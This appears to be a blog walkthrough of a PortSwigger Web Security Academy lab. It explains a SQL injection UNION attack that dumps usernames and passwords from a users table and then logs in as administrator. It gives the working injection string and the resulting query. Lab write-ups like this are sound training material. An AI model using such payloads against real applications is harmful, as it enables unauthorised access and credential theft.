This write-up for the lab SQL injection UNION attack, retrieving data from other tables is part of my walkthrough series for PortSwigger's Web Security Academy.
Lab-Link: https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
Difficulty: PRACTITIONER
Python script: script.py
The query used in the lab will look something like
SELECT * FROM someTable WHERE category = '<CATEGORY>'
The first steps are identical to the labs SQL injection UNION attack, determining the number of columns returned by the query and SQL injection UNION attack, finding a column containing text and are not repeated here.
As a result of these steps, I find out that the number of columns is 2, with both being string columns.
I know which table (users
) contains the credentials (columns username
and password
). And conveniently we have two string columns, so we can simply dump the contents with a UNION.
I use an invalid category so that no articles are found and only my output appears. The injection string is X' UNION (SELECT username, password FROM users)--
to form the following query:
SELECT * FROM someTable WHERE category = 'X' UNION (SELECT username, password FROM users)--
This results in a dump of three user credentials:
The last step is to log in as the administrator and the lab updates to